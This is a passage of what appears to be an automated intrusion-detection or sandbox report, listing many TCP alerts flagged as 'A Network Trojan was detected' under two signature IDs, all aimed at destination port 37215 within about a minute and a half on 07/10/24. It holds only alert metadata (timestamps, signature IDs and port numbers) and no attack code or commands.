                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.504435
                  SID:2835222
                  Source Port:35486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.298148
                  SID:2835222
                  Source Port:50560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.339309
                  SID:2829579
                  Source Port:58344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.621009
                  SID:2835222
                  Source Port:42774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.654312
                  SID:2829579
                  Source Port:51712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.149592
                  SID:2829579
                  Source Port:55038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.712584
                  SID:2829579
                  Source Port:43852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.598670
                  SID:2829579
                  Source Port:42690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.547260
                  SID:2829579
                  Source Port:43064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.509927
                  SID:2835222
                  Source Port:52200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.072676
                  SID:2835222
                  Source Port:49152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.356358
                  SID:2835222
                  Source Port:36316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.767328
                  SID:2835222
                  Source Port:32964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.271475
                  SID:2829579
                  Source Port:38272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.636045
                  SID:2829579
                  Source Port:43296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.129960
                  SID:2835222
                  Source Port:54044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.289517
                  SID:2835222
                  Source Port:43806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.447518
                  SID:2835222
                  Source Port:48138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.469991
                  SID:2829579
                  Source Port:50774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.122106
                  SID:2829579
                  Source Port:45962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.789952
                  SID:2835222
                  Source Port:42390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.990301
                  SID:2829579
                  Source Port:51610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.037647
                  SID:2835222
                  Source Port:46748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.798309
                  SID:2835222
                  Source Port:60820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.660364
                  SID:2829579
                  Source Port:40668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.312815
                  SID:2835222
                  Source Port:36008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.347593
                  SID:2829579
                  Source Port:60944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.017469
                  SID:2829579
                  Source Port:45124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.289517
                  SID:2829579
                  Source Port:34558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.429606
                  SID:2835222
                  Source Port:57290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.383866
                  SID:2835222
                  Source Port:51862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.179104
                  SID:2835222
                  Source Port:37214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.658405
                  SID:2829579
                  Source Port:47002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.146612
                  SID:2829579
                  Source Port:57732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.474823
                  SID:2829579
                  Source Port:45440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.646163
                  SID:2829579
                  Source Port:60290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.634002
                  SID:2835222
                  Source Port:48218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.890246
                  SID:2829579
                  Source Port:55936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.569923
                  SID:2829579
                  Source Port:42790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.031000
                  SID:2835222
                  Source Port:35250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.309786
                  SID:2829579
                  Source Port:54644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.910396
                  SID:2829579
                  Source Port:53450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.228367
                  SID:2835222
                  Source Port:55532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.730213
                  SID:2829579
                  Source Port:52228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571797
                  SID:2829579
                  Source Port:45786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.939106
                  SID:2829579
                  Source Port:44118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.933470
                  SID:2829579
                  Source Port:43406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.886878
                  SID:2835222
                  Source Port:46306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.004386
                  SID:2829579
                  Source Port:56226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.856754
                  SID:2835222
                  Source Port:33066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.783603
                  SID:2829579
                  Source Port:46948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.042472
                  SID:2835222
                  Source Port:34722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.223907
                  SID:2835222
                  Source Port:47544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.521330
                  SID:2835222
                  Source Port:54916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.360438
                  SID:2835222
                  Source Port:35930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.281648
                  SID:2829579
                  Source Port:47538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.873958
                  SID:2829579
                  Source Port:46968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.916413
                  SID:2829579
                  Source Port:58836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.615907
                  SID:2829579
                  Source Port:48306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.626418
                  SID:2829579
                  Source Port:39332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.782000
                  SID:2835222
                  Source Port:60806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.520394
                  SID:2829579
                  Source Port:35220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.159669
                  SID:2829579
                  Source Port:53156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.845766
                  SID:2829579
                  Source Port:46296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.849080
                  SID:2835222
                  Source Port:33820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.479752
                  SID:2835222
                  Source Port:57898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.843143
                  SID:2829579
                  Source Port:58522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.785283
                  SID:2835222
                  Source Port:53834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.915755
                  SID:2829579
                  Source Port:57106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.601358
                  SID:2835222
                  Source Port:35284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.619310
                  SID:2835222
                  Source Port:52356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.273246
                  SID:2835222
                  Source Port:40968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.824818
                  SID:2829579
                  Source Port:43038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.325591
                  SID:2829579
                  Source Port:42824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.583346
                  SID:2829579
                  Source Port:33128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.937320
                  SID:2829579
                  Source Port:37600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.753390
                  SID:2829579
                  Source Port:56664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.532639
                  SID:2829579
                  Source Port:45476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.462014
                  SID:2829579
                  Source Port:53326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.949635
                  SID:2835222
                  Source Port:51870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.672613
                  SID:2835222
                  Source Port:60004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.887676
                  SID:2835222
                  Source Port:44544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.535684
                  SID:2835222
                  Source Port:53746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.996765
                  SID:2835222
                  Source Port:46938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.380620
                  SID:2835222
                  Source Port:43772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.979728
                  SID:2835222
                  Source Port:45768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.426125
                  SID:2835222
                  Source Port:35696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.836233
                  SID:2829579
                  Source Port:53396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.576440
                  SID:2835222
                  Source Port:34116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.113927
                  SID:2829579
                  Source Port:58350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.078951
                  SID:2835222
                  Source Port:55740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.995730
                  SID:2829579
                  Source Port:50730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.831289
                  SID:2829579
                  Source Port:49366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.980775
                  SID:2829579
                  Source Port:54516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.748733
                  SID:2829579
                  Source Port:35432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.456990
                  SID:2829579
                  Source Port:41566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.278203
                  SID:2835222
                  Source Port:43668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.799100
                  SID:2835222
                  Source Port:33616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.252129
                  SID:2829579
                  Source Port:56492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.565173
                  SID:2835222
                  Source Port:41424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.866153
                  SID:2835222
                  Source Port:47778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.251100
                  SID:2829579
                  Source Port:46846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.385644
                  SID:2829579
                  Source Port:39018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.551128
                  SID:2835222
                  Source Port:45646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.126128
                  SID:2835222
                  Source Port:53102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927122
                  SID:2829579
                  Source Port:52578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.934356
                  SID:2835222
                  Source Port:41874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.663912
                  SID:2829579
                  Source Port:40808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.591446
                  SID:2835222
                  Source Port:55464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.793732
                  SID:2829579
                  Source Port:53472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.323441
                  SID:2835222
                  Source Port:60150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.668166
                  SID:2835222
                  Source Port:51062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.306994
                  SID:2829579
                  Source Port:50914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.819720
                  SID:2835222
                  Source Port:58330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.949605
                  SID:2829579
                  Source Port:56216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.938620
                  SID:2829579
                  Source Port:34558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.766150
                  SID:2829579
                  Source Port:34292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.869440
                  SID:2829579
                  Source Port:47464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.827269
                  SID:2829579
                  Source Port:38712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.938884
                  SID:2835222
                  Source Port:34144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.795318
                  SID:2829579
                  Source Port:43586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.886738
                  SID:2829579
                  Source Port:43802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.160309
                  SID:2829579
                  Source Port:39208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.068125
                  SID:2829579
                  Source Port:60350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.565091
                  SID:2835222
                  Source Port:37178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.558738
                  SID:2835222
                  Source Port:51914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.119977
                  SID:2829579
                  Source Port:43310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164451
                  SID:2829579
                  Source Port:46608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.813781
                  SID:2829579
                  Source Port:51958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.961699
                  SID:2829579
                  Source Port:51860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.847892
                  SID:2835222
                  Source Port:58948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.837178
                  SID:2829579
                  Source Port:60426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.577459
                  SID:2829579
                  Source Port:47404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.029316
                  SID:2835222
                  Source Port:57130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.543266
                  SID:2829579
                  Source Port:45560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.902594
                  SID:2829579
                  Source Port:57164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.736564
                  SID:2829579
                  Source Port:49094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.948431
                  SID:2835222
                  Source Port:49210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.281648
                  SID:2835222
                  Source Port:50896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.683059
                  SID:2835222
                  Source Port:34778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.937799
                  SID:2829579
                  Source Port:57428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.043481
                  SID:2835222
                  Source Port:33464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.814573
                  SID:2835222
                  Source Port:45568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.439490
                  SID:2829579
                  Source Port:47598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.460773
                  SID:2829579
                  Source Port:42224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.002898
                  SID:2835222
                  Source Port:42598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.598670
                  SID:2829579
                  Source Port:46908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.930240
                  SID:2829579
                  Source Port:45074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.593829
                  SID:2835222
                  Source Port:35960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.886878
                  SID:2829579
                  Source Port:42420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.876812
                  SID:2835222
                  Source Port:46056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.988917
                  SID:2829579
                  Source Port:34766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.565253
                  SID:2835222
                  Source Port:49072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.279248
                  SID:2835222
                  Source Port:56966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.030907
                  SID:2835222
                  Source Port:52406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.844415
                  SID:2829579
                  Source Port:52456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.830605
                  SID:2835222
                  Source Port:37210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.300901
                  SID:2829579
                  Source Port:60180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.385643
                  SID:2835222
                  Source Port:36480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.720259
                  SID:2829579
                  Source Port:35490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.914587
                  SID:2835222
                  Source Port:32976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.757983
                  SID:2829579
                  Source Port:41664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.418151
                  SID:2835222
                  Source Port:35242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.239596
                  SID:2835222
                  Source Port:43738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.439991
                  SID:2829579
                  Source Port:51068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.279611
                  SID:2835222
                  Source Port:38310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.425989
                  SID:2835222
                  Source Port:54966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.576463
                  SID:2835222
                  Source Port:33788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.421673
                  SID:2835222
                  Source Port:35312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.909178
                  SID:2829579
                  Source Port:43712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.326133
                  SID:2829579
                  Source Port:42714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.979498
                  SID:2835222
                  Source Port:38280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.487738
                  SID:2835222
                  Source Port:54036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.657451
                  SID:2829579
                  Source Port:53674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.516492
                  SID:2835222
                  Source Port:37474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.967013
                  SID:2829579
                  Source Port:37362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.639022
                  SID:2829579
                  Source Port:60686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.322486
                  SID:2829579
                  Source Port:60714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.585190
                  SID:2835222
                  Source Port:50068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.904086
                  SID:2835222
                  Source Port:35922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.587919
                  SID:2829579
                  Source Port:45024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.049112
                  SID:2835222
                  Source Port:36602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.820956
                  SID:2835222
                  Source Port:60976
